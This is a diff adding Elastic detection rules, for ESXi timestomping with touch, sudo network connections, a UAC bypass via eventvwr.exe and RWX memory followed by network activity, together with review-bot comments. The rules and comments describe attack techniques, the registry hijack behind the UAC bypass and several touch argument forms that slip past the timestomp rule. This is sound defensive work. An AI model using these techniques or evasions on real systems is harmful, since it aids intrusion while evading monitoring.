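Review bot: The `process.args == "-r"` condition in `30bfddd7-2954-4c9d-bbc6-19a99ca47e23_7.json` matches only a standalone `-r` token, so option bundling and attachment (`touch -amr ref target`, `touch -r/etc/vmware/x target`) and the long form `--reference=/etc/vmware/x` all pass undetected; version 6 had the same gap with `process.args : "-r"`. Explicit timestamps via `-t`/`-d` on the same paths are also a timestomp and are not covered. A wildcard closes the attached and long forms, `process.args : ("-r*", "--reference=*")`, while the bundled `-amr` form needs a looser pattern such as `"-*r"` if the false-positive rate allows. As far as I know ESXi's `touch` is busybox, so which of these option forms it accepts should be checked before relying on the long option for coverage.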
@@ -0,0 +1,101 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies instances where the 'touch' command is executed on a Linux system with the \"-r\" flag, which is used to modify the timestamp of a file based on another file's timestamp. The rule targets specific VM-related paths, such as \"/etc/vmware/\", \"/usr/lib/vmware/\", or \"/vmfs/*\". These paths are associated with VMware virtualization software, and their presence in the touch command arguments may indicate that a threat actor is attempting to tamper with timestamps of VM-related files and configurations on the system.", + "from": "now-9m", + "index": [ + "logs-endpoint.events.*", + "endgame-*", + "auditbeat-*", + "logs-auditd_manager.auditd-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "ESXI Timestomping using Touch Command", + "query": "process where host.os.type == \"linux\" and event.type == \"start\" and event.action in (\"exec\", \"exec_event\", \"executed\", \"process_started\")\n and process.name == \"touch\" and process.args == \"-r\" and\nprocess.args : (\"/etc/vmware/*\", \"/usr/lib/vmware/*\", \"/vmfs/*\")\n", + "references": [ + "https://www.bleepingcomputer.com/news/security/massive-esxiargs-ransomware-attack-targets-vmware-esxi-servers-worldwide/" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "auditd_manager", + "version": "^1.0.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "30bfddd7-2954-4c9d-bbc6-19a99ca47e23", + "setup": "## Setup\n\nThis rule requires data coming in from Elastic Defend.\n\n### Elastic 
Defend Integration Setup\nElastic Defend is integrated into the Elastic Agent using Fleet. Upon configuration, the integration allows the Elastic Agent to monitor events on your host and send data to the Elastic Security app.\n\n#### Prerequisite Requirements:\n- Fleet is required for Elastic Defend.\n- To configure Fleet Server refer to the [documentation](https://www.elastic.co/guide/en/fleet/current/fleet-server.html).\n\n#### The following steps should be executed in order to add the Elastic Defend integration on a Linux System:\n- Go to the Kibana home page and click \"Add integrations\".\n- In the query bar, search for \"Elastic Defend\" and select the integration to see more details about it.\n- Click \"Add Elastic Defend\".\n- Configure the integration name and optionally add a description.\n- Select the type of environment you want to protect, either \"Traditional Endpoints\" or \"Cloud Workloads\".\n- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. [Helper guide](https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html).\n- We suggest selecting \"Complete EDR (Endpoint Detection and Response)\" as a configuration setting, that provides \"All events; all preventions\"\n- Enter a name for the agent policy in \"New agent policy name\". 
If other agent policies already exist, you can click the \"Existing hosts\" tab and select an existing policy instead.\nFor more details on Elastic Agent configuration settings, refer to the [helper guide](https://www.elastic.co/guide/en/fleet/8.10/agent-policy.html).\n- Click \"Save and Continue\".\n- To complete the integration, select \"Add Elastic Agent to your hosts\" and continue to the next section to install the Elastic Agent on your hosts.\nFor more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Defense Evasion", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend", + "Data Source: Auditd Manager" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1070", + "name": "Indicator Removal", + "reference": "https://attack.mitre.org/techniques/T1070/", + "subtechnique": [ + { + "id": "T1070.006", + "name": "Timestomp", + "reference": "https://attack.mitre.org/techniques/T1070/006/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 8 + }, + "id": "30bfddd7-2954-4c9d-bbc6-19a99ca47e23_8", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/30e1e9f2-eb9c-439f-aff6-1e3068e99384_2.json b/packages/security_detection_engine/kibana/security_rule/30e1e9f2-eb9c-439f-aff6-1e3068e99384_2.json new file mode 100644 index 00000000000..ccab693fc7f --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/30e1e9f2-eb9c-439f-aff6-1e3068e99384_2.json 
@@ -0,0 +1,98 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Detects network connections initiated by the \"sudo\" binary. This behavior is uncommon and may occur in instances where reverse shell shellcode is injected into a process run with elevated permissions via \"sudo\". Attackers may attempt to inject shellcode into processes running as root, to escalate privileges.", + "from": "now-9m", + "index": [ + "logs-endpoint.events.*", + "endgame-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Suspicious Network Connection via Sudo Binary", + "query": "network where host.os.type == \"linux\" and event.type == \"start\" and\nevent.action in (\"connection_attempted\", \"ipv4_connection_attempt_event\") and process.name == \"sudo\"\n", + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "30e1e9f2-eb9c-439f-aff6-1e3068e99384", + "setup": "## Setup\n\n\nThis rule requires data coming in from Elastic Defend.\n\n### Elastic Defend Integration Setup\nElastic Defend is integrated into the Elastic Agent using Fleet. 
Upon configuration, the integration allows the Elastic Agent to monitor events on your host and send data to the Elastic Security app.\n\n#### Prerequisite Requirements:\n- Fleet is required for Elastic Defend.\n- To configure Fleet Server refer to the [documentation](https://www.elastic.co/guide/en/fleet/current/fleet-server.html).\n\n#### The following steps should be executed in order to add the Elastic Defend integration on a Linux System:\n- Go to the Kibana home page and click \"Add integrations\".\n- In the query bar, search for \"Elastic Defend\" and select the integration to see more details about it.\n- Click \"Add Elastic Defend\".\n- Configure the integration name and optionally add a description.\n- Select the type of environment you want to protect, either \"Traditional Endpoints\" or \"Cloud Workloads\".\n- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. [Helper guide](https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html).\n- We suggest selecting \"Complete EDR (Endpoint Detection and Response)\" as a configuration setting, that provides \"All events; all preventions\"\n- Enter a name for the agent policy in \"New agent policy name\". 
If other agent policies already exist, you can click the \"Existing hosts\" tab and select an existing policy instead.\nFor more details on Elastic Agent configuration settings, refer to the [helper guide](https://www.elastic.co/guide/en/fleet/8.10/agent-policy.html).\n- Click \"Save and Continue\".\n- To complete the integration, select \"Add Elastic Agent to your hosts\" and continue to the next section to install the Elastic Agent on your hosts.\nFor more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Privilege Escalation", + "Data Source: Elastic Defend", + "Data Source: Elastic Endgame" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0004", + "name": "Privilege Escalation", + "reference": "https://attack.mitre.org/tactics/TA0004/" + }, + "technique": [ + { + "id": "T1055", + "name": "Process Injection", + "reference": "https://attack.mitre.org/techniques/T1055/", + "subtechnique": [ + { + "id": "T1055.008", + "name": "Ptrace System Calls", + "reference": "https://attack.mitre.org/techniques/T1055/008/" + } + ] + }, + { + "id": "T1548", + "name": "Abuse Elevation Control Mechanism", + "reference": "https://attack.mitre.org/techniques/T1548/", + "subtechnique": [ + { + "id": "T1548.003", + "name": "Sudo and Sudo Caching", + "reference": "https://attack.mitre.org/techniques/T1548/003/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 2 + }, + "id": "30e1e9f2-eb9c-439f-aff6-1e3068e99384_2", + "type": "security-rule" +} \ No newline at end of file 
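Review bot: The new rule file for 30e1e9f2-eb9c-439f-aff6-1e3068e99384_2 carries no `false_positives` entry, although `sudo` legitimately initiates network connections on hosts where sudoers lookups or PAM authentication are backed by a directory service (sudo built with LDAP support, or in-process PAM modules that talk to LDAP/Kerberos), so every such host will raise this alert on ordinary use. Consider adding `"false_positives": ["Hosts that resolve sudoers or authenticate via a network directory service (LDAP, Kerberos) will produce outbound connections from sudo; add per-host or per-destination exceptions for those environments."]` next to `"from"` so analysts tuning the rule see the expected benign source. The `description` already hints at the injection scenario, but the query at `"query"` matches on `process.name == "sudo"` alone, which is what makes the caveat necessary. As a smaller point, the `setup` string opens with `## Setup\n\n\nThis rule` (three newlines) where the sibling rule files in this commit use two.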
diff --git a/packages/security_detection_engine/kibana/security_rule/31b4c719-f2b4-41f6-a9bd-fce93c2eaf62_111.json b/packages/security_detection_engine/kibana/security_rule/31b4c719-f2b4-41f6-a9bd-fce93c2eaf62_111.json new file mode 100644 index 00000000000..e37a58f0103 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/31b4c719-f2b4-41f6-a9bd-fce93c2eaf62_111.json 
@@ -0,0 +1,122 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies User Account Control (UAC) bypass via eventvwr.exe. Attackers bypass UAC to stealthily execute code with elevated permissions.", + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-endpoint.events.*", + "logs-windows.*", + "endgame-*", + "logs-system.security*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Bypass UAC via Event Viewer", + "note": "## Triage and analysis\n\n### Investigating Bypass UAC via Event Viewer\n\nWindows User Account Control (UAC) allows a program to elevate its privileges (tracked as low to high integrity levels) to perform a task under administrator-level permissions, possibly by prompting the user for confirmation. UAC can deny an operation under high-integrity enforcement, or allow the user to perform the action if they are in the local administrators group and enter an administrator password when prompted.\n\nFor more information about the UAC and how it works, check the [official Microsoft docs page](https://docs.microsoft.com/en-us/windows/security/identity-protection/user-account-control/how-user-account-control-works).\n\nDuring startup, `eventvwr.exe` checks the registry value of the `HKCU\\Software\\Classes\\mscfile\\shell\\open\\command` registry key for the location of `mmc.exe`, which is used to open the `eventvwr.msc` saved console file. If the location of another binary or script is added to this registry value, it will be executed as a high-integrity process without a UAC prompt being displayed to the user. This rule detects this UAC bypass by monitoring processes spawned by `eventvwr.exe` other than `mmc.exe` and `werfault.exe`.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. 
Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Inspect the host for suspicious or abnormal behavior in the alert timeframe.\n- Investigate any abnormal behavior by the subject process such as network connections, registry or file modifications, and any spawned child processes.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE 
'%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. 
This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "process where host.os.type == \"windows\" and event.type == \"start\" and\n process.parent.name : \"eventvwr.exe\" and\n not process.executable :\n (\"?:\\\\Windows\\\\SysWOW64\\\\mmc.exe\",\n \"?:\\\\Windows\\\\System32\\\\mmc.exe\",\n \"?:\\\\Windows\\\\SysWOW64\\\\WerFault.exe\",\n \"?:\\\\Windows\\\\System32\\\\WerFault.exe\")\n", + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + }, + { + "package": "system", + "version": "^1.6.4" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.executable", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.name", + "type": "keyword" + } + ], + "risk_score": 73, + "rule_id": "31b4c719-f2b4-41f6-a9bd-fce93c2eaf62", + "setup": "## Setup\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - 
https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "severity": "high", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Privilege Escalation", + "Tactic: Defense Evasion", + "Resources: Investigation Guide", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0004", + "name": "Privilege Escalation", + "reference": "https://attack.mitre.org/tactics/TA0004/" + }, + "technique": [ + { + "id": "T1548", + "name": "Abuse Elevation Control Mechanism", + "reference": "https://attack.mitre.org/techniques/T1548/", + "subtechnique": [ + { + "id": "T1548.002", + "name": "Bypass User Account Control", + "reference": "https://attack.mitre.org/techniques/T1548/002/" + } + ] + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1548", + "name": "Abuse Elevation Control Mechanism", + "reference": "https://attack.mitre.org/techniques/T1548/", + "subtechnique": [ + { + "id": "T1548.002", + "name": "Bypass User Account Control", + "reference": "https://attack.mitre.org/techniques/T1548/002/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 111 + }, + "id": "31b4c719-f2b4-41f6-a9bd-fce93c2eaf62_111", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/31b4c719-f2b4-41f6-a9bd-fce93c2eaf62_112.json b/packages/security_detection_engine/kibana/security_rule/31b4c719-f2b4-41f6-a9bd-fce93c2eaf62_112.json new file mode 100644 index 00000000000..7db32725ef6 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/31b4c719-f2b4-41f6-a9bd-fce93c2eaf62_112.json 
@@ -0,0 +1,122 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies User Account Control (UAC) bypass via eventvwr.exe. Attackers bypass UAC to stealthily execute code with elevated permissions.", + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-endpoint.events.process-*", + "logs-windows.*", + "endgame-*", + "logs-system.security*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Bypass UAC via Event Viewer", + "note": "## Triage and analysis\n\n### Investigating Bypass UAC via Event Viewer\n\nWindows User Account Control (UAC) allows a program to elevate its privileges (tracked as low to high integrity levels) to perform a task under administrator-level permissions, possibly by prompting the user for confirmation. UAC can deny an operation under high-integrity enforcement, or allow the user to perform the action if they are in the local administrators group and enter an administrator password when prompted.\n\nFor more information about the UAC and how it works, check the [official Microsoft docs page](https://docs.microsoft.com/en-us/windows/security/identity-protection/user-account-control/how-user-account-control-works).\n\nDuring startup, `eventvwr.exe` checks the registry value of the `HKCU\\Software\\Classes\\mscfile\\shell\\open\\command` registry key for the location of `mmc.exe`, which is used to open the `eventvwr.msc` saved console file. If the location of another binary or script is added to this registry value, it will be executed as a high-integrity process without a UAC prompt being displayed to the user. This rule detects this UAC bypass by monitoring processes spawned by `eventvwr.exe` other than `mmc.exe` and `werfault.exe`.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. 
Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Inspect the host for suspicious or abnormal behavior in the alert timeframe.\n- Investigate any abnormal behavior by the subject process such as network connections, registry or file modifications, and any spawned child processes.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE 
'%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. 
This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "process where host.os.type == \"windows\" and event.type == \"start\" and\n process.parent.name : \"eventvwr.exe\" and\n not process.executable :\n (\"?:\\\\Windows\\\\SysWOW64\\\\mmc.exe\",\n \"?:\\\\Windows\\\\System32\\\\mmc.exe\",\n \"?:\\\\Windows\\\\SysWOW64\\\\WerFault.exe\",\n \"?:\\\\Windows\\\\System32\\\\WerFault.exe\")\n", + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + }, + { + "package": "system", + "version": "^1.6.4" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.executable", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.name", + "type": "keyword" + } + ], + "risk_score": 73, + "rule_id": "31b4c719-f2b4-41f6-a9bd-fce93c2eaf62", + "setup": "## Setup\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - 
https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "severity": "high", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Privilege Escalation", + "Tactic: Defense Evasion", + "Resources: Investigation Guide", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0004", + "name": "Privilege Escalation", + "reference": "https://attack.mitre.org/tactics/TA0004/" + }, + "technique": [ + { + "id": "T1548", + "name": "Abuse Elevation Control Mechanism", + "reference": "https://attack.mitre.org/techniques/T1548/", + "subtechnique": [ + { + "id": "T1548.002", + "name": "Bypass User Account Control", + "reference": "https://attack.mitre.org/techniques/T1548/002/" + } + ] + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1548", + "name": "Abuse Elevation Control Mechanism", + "reference": "https://attack.mitre.org/techniques/T1548/", + "subtechnique": [ + { + "id": "T1548.002", + "name": "Bypass User Account Control", + "reference": "https://attack.mitre.org/techniques/T1548/002/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 112 + }, + "id": "31b4c719-f2b4-41f6-a9bd-fce93c2eaf62_112", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/32300431-c2d5-432d-8ec8-0e03f9924756_1.json b/packages/security_detection_engine/kibana/security_rule/32300431-c2d5-432d-8ec8-0e03f9924756_1.json new file mode 100644 index 00000000000..03b7b91d54f --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/32300431-c2d5-432d-8ec8-0e03f9924756_1.json 
@@ -0,0 +1,134 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Monitors for the execution of a unix binary with read, write and execute memory region permissions, followed by a network connection. The mprotect() system call is used to change the access protections on a region of memory that has already been allocated. This syscall allows a process to modify the permissions of pages in its virtual address space, enabling or disabling permissions such as read, write, and execute for those pages. RWX permissions on memory is in many cases overly permissive, and should (especially in conjunction with an outbound network connection) be analyzed thoroughly.", + "from": "now-9m", + "index": [ + "logs-endpoint.events.*", + "auditbeat-*", + "logs-auditd_manager.auditd-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Network Connection from Binary with RWX Memory Region", + "query": "sample by host.id, process.pid, process.name\n /* auditd.data.a2 == \"7\" translates to RWX memory region protection (PROT_READ | PROT_WRITE | PROT_EXEC) */\n [process where host.os.type == \"linux\" and auditd.data.syscall == \"mprotect\" and auditd.data.a2 == \"7\"]\n [network where host.os.type == \"linux\" and event.type == \"start\" and event.action == \"connection_attempted\" and\n not cidrmatch(destination.ip, \"127.0.0.0/8\", \"169.254.0.0/16\", \"224.0.0.0/4\", \"::1\")]\n", + "references": [ + "https://man7.org/linux/man-pages/man2/mprotect.2.html" + ], + "related_integrations": [ + { + "package": "auditd_manager", + "version": "^1.0.0" + }, + { + "package": "endpoint", + "version": "^8.2.0" + } + ], + "required_fields": [ + { + "ecs": false, + "name": "auditd.data.a2", + "type": "unknown" + }, + { + "ecs": false, + "name": "auditd.data.syscall", + "type": "unknown" + }, + { + "ecs": true, + "name": "destination.ip", + "type": "ip" + }, + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": 
"event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.id", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.pid", + "type": "long" + } + ], + "risk_score": 47, + "rule_id": "32300431-c2d5-432d-8ec8-0e03f9924756", + "setup": "## Setup\n\nThis rule requires the use of the `auditd_manager` integration. `Auditd_manager` is a tool designed to simplify and enhance the management of the audit subsystem in Linux systems. It provides a user-friendly interface and automation capabilities for configuring and monitoring system auditing through the auditd daemon. With `auditd_manager`, administrators can easily define audit rules, track system events, and generate comprehensive audit reports, improving overall security and compliance in the system. The following steps should be executed in order to install and deploy `auditd_manager` on a Linux system.\n```\nKibana -->\nManagement -->\nIntegrations -->\nAuditd Manager -->\nAdd Auditd Manager\n```\n`Auditd_manager` subscribes to the kernel and receives events as they occur without any additional configuration. 
However, if more advanced configuration is required to detect specific behavior, audit rules can be added to the integration in either the \"audit rules\" configuration box or the \"auditd rule files\" box by specifying a file to read the audit rules from.\nFor this detection rule to trigger, the following additional audit rules are required to be added to the integration:\n```\n-a always,exit -F arch=b64 -S mprotect\n```\nAdd the newly installed `auditd manager` to an agent policy, and deploy the agent on a Linux system from which auditd log files are desirable.\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Execution", + "Data Source: Elastic Defend", + "Data Source: Auditd Manager" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0002", + "name": "Execution", + "reference": "https://attack.mitre.org/tactics/TA0002/" + }, + "technique": [ + { + "id": "T1059", + "name": "Command and Scripting Interpreter", + "reference": "https://attack.mitre.org/techniques/T1059/", + "subtechnique": [ + { + "id": "T1059.004", + "name": "Unix Shell", + "reference": "https://attack.mitre.org/techniques/T1059/004/" + } + ] + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0011", + "name": "Command and Control", + "reference": "https://attack.mitre.org/tactics/TA0011/" + }, + "technique": [ + { + "id": "T1071", + "name": "Application Layer Protocol", + "reference": "https://attack.mitre.org/techniques/T1071/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 1 + }, + "id": "32300431-c2d5-432d-8ec8-0e03f9924756_1", + "type": "security-rule" +} \ No newline at end of file 
